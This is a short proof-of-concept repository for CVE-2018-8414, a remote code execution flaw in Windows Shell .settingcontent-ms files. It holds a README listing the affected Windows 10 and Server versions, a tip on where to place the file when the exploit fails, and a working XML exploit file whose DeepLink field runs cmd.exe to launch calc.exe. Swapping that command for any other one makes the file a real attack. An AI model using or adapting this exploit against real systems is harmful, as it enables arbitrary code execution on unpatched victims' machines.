├── README.md
└── poc.settingcontent-ms


/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2018-8414 POC
 2 | 
 3 | Windows Shell Package Setting Remote Code Execution Vulnerability
 4 | 
 5 | Since : Windows 10 Version 1703 to 1803
 6 |        / Windows Server Version 1709 to 1803
 7 |        
 8 | Note : Some time the exploit fail depending of the file location (default policy settings), so for that just copy the file in the Package Settings Dir and it should execute rightly
 9 | * C:\Users\\[USER]\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\\[LANGUAGE]\
10 | 
11 | More details : https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8414
12 | 
13 | Credit to 0patch
14 | 


--------------------------------------------------------------------------------
/poc.settingcontent-ms:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <PCSettings>
 3 |   <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
 4 |     <ApplicationInformation>
 5 |       <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
 6 |       <DeepLink>%windir%\system32\cmd.exe /c calc.exe</DeepLink>
 7 |       <Icon>%windir%\system32\control.exe</Icon>
 8 |     </ApplicationInformation>
 9 |     <SettingIdentity>
10 |       <PageID></PageID>
11 |       <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
12 |     </SettingIdentity>
13 |     <SettingInformation>
14 |       <Description>@shell32.dll,-4161</Description>
15 |       <Keywords>@shell32.dll,-4161</Keywords>
16 |     </SettingInformation>
17 |   </SearchableContent>
18 | </PCSettings>
19 | 


--------------------------------------------------------------------------------